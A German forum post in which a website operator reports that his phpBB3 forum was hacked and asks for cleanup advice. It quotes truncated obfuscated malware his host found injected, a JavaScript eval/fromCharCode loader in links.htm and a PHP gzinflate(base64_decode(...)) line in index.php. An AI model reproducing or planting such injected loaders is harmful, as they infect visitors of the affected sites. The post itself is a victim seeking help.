ich betreibe auf meiner Webseite auch ein Forum. Heute hatte mich ein User darauf aufmerksam gemacht, dass er eine Trojanerwarnung erhalten habe als er das Forum angeklickt hatte.
Als ich das kontrollieren wollte habe ich gemerkt, dass die Schrift viel größer als eingestellt ist. Aufgeschreckt davon habe ich dann meiner Hoster angemailt und der hat mir bestätigt:
Und jetzt stehe ich da wie blöd und weis nicht was ich machen soll. Natürlich habe ich das Forum erst mal stillgelegt und einen Hinweis ins Web gestellt.> Kann es sein, dass sich da einer reingekackt hat?
Ja. Da sind einige Dateien bei Ihnen "verschönert" worden. Beispiel:
links.htm
<!--f071c3--><script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+=(h)?'ode':"";w=this;e=w[f["s$
Ist ein verschlüsselter Code. Allerdings wird der bei Aufruf der Datei entschlüsselt und schon gibt es eine Virenwarnung.
Noch ein Beispiel:
index.php im Verzeichnis phpbb3
#f071c3#
echo(gzinflate(base64_decode("zVZtb6JAEP4ttyEBSrTOwi5wlOsHc7/gPho/WMWDxooCbVNN//vt7C4r2mppc8ldIm+z8z7zjHNTz6ti0/xoqpf9Nl2U88eHbN0M51U2a7Kfqwy/HLIgHinE9UTcZDucbTbZejHOi9XC2XpE0F7ns2aeO9tnd5+ngxHQa5a8ospNVTZl87LJWpa7Krur3P1ul9qzlZ3gc/dkD+$
#/f071c3#
Aber wie gehe ich jetzt vor? Ich kann doch nicht einfach alles löschen und neu aufsetzen?
Kann mir bitte jemand einen Rat geben der auch von einem Oldtimer begriffen werden kann? PHP ist nicht so mein Ding.
